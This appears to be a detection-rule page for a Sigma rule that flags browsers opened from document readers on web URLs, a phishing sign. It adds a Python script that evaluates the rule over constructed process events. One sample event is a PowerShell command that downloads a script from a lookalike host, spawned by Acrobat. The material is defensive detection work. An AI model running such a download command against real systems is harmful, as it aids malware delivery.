Unlikely in most cases. When the rule fires, investigate the command line of the browser process to determine the context of the URL that was accessed (which document spawned the browser, and what host the URL points to).

Techniques

Sample rules

Potential Suspicious Browser Launch From Document Reader Process

Description

Detects a browser process or browser tab being launched by an application that handles document files, such as Adobe Acrobat Reader or Microsoft Office, with a command line that points at a web application over HTTP(S). A document that opens a browser on a URL is a common phishing pattern, so this could indicate a phishing attempt.

Detection logic

```yaml
detection:
    selection:
        CommandLine|contains: 'http'
        Image|endswith:
            - '\brave.exe'
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
            - '\opera.exe'
            - '\maxthon.exe'
            - '\seamonkey.exe'
            - '\vivaldi.exe'
            # The listing also carried an empty string ('') here. An empty suffix
            # matches every Image and silently widens the rule to any child process
            # of a document reader with 'http' on its command line, so it is dropped.
        ParentImage|contains:
            - 'Acrobat Reader'
            - 'Microsoft Office'
            - 'PDF Reader'
    condition: selection
```
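The following is an added example, not part of the rule or of the LoFP page: it runs the selection above over a handful of constructed Sysmon-style process-creation events and pulls the URL host out of each hit, which is the triage step the false-positive note asks for. It also shows what happens when the stray empty-string suffix is left in the Image list: a non-browser child (here a constructed PowerShell download) matches too. Field names follow the Sigma rule; the paths, hosts and command lines are made up.

```python
"""Evaluate the 'browser launched from document reader' selection and triage hits."""
import re
from urllib.parse import urlparse

# Selection values from the Sigma rule. Sigma string matching is case-insensitive,
# so event fields are lowercased before comparison and the values are kept lowercase.
PARENT_CONTAINS = ("acrobat reader", "microsoft office", "pdf reader")
IMAGE_ENDSWITH = (
    r"\brave.exe", r"\chrome.exe", r"\firefox.exe", r"\msedge.exe",
    r"\opera.exe", r"\maxthon.exe", r"\seamonkey.exe", r"\vivaldi.exe",
)
COMMANDLINE_CONTAINS = ("http",)

# The published list with the empty-string entry kept: '' is a suffix of every
# string, so the Image restriction disappears and any child process matches.
IMAGE_ENDSWITH_WITH_EMPTY = IMAGE_ENDSWITH + ("",)

# Constructed process-creation events (Sysmon EID 1 style), not real telemetry.
SAMPLE_EVENTS = [
    {   # hit: Acrobat opens Chrome on a URL from the PDF
        "ParentImage": r"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe",
        "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument https://login.example-invoice.test/verify',
    },
    {   # no hit: parent is Explorer, not a document reader
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://intranet.example.test/',
    },
    {   # hit: Word opens Firefox on a URL
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://docs.example.test/sheet',
    },
    {   # no hit: browser launched from Excel but with no URL on the command line
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe"',
    },
    {   # not a browser: only matches if the empty suffix is left in the rule
        "ParentImage": r"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -c "Invoke-WebRequest http://updates.example-invoice.test/a.ps1"',
    },
]


def matches(event, image_suffixes=IMAGE_ENDSWITH):
    """True when the event satisfies all three fields of the selection."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    return (
        any(p in parent for p in PARENT_CONTAINS)
        and any(image.endswith(s) for s in image_suffixes)
        and any(c in cmd for c in COMMANDLINE_CONTAINS)
    )


# Good enough for command lines: stop at whitespace or a quote character.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def urls_in_commandline(event):
    return URL_RE.findall(event.get("CommandLine", ""))


def triage(events, image_suffixes=IMAGE_ENDSWITH):
    """One record per hit, carrying the parent, child and URL hosts an analyst should check."""
    hits = []
    for ev in events:
        if not matches(ev, image_suffixes):
            continue
        urls = urls_in_commandline(ev)
        hits.append({
            "parent": ev["ParentImage"].rsplit("\\", 1)[-1],
            "image": ev["Image"].rsplit("\\", 1)[-1],
            "urls": urls,
            "hosts": [urlparse(u).hostname for u in urls],
        })
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit['parent']} -> {hit['image']}: {hit['hosts']}")
    print("with empty suffix:", len(triage(SAMPLE_EVENTS, IMAGE_ENDSWITH_WITH_EMPTY)), "hits")
```

The host list is what decides the false-positive question: an internal or well-known SaaS host reached from a spreadsheet link is the benign case the note describes, while a lookalike host reached from a PDF is the phishing case the rule is written for.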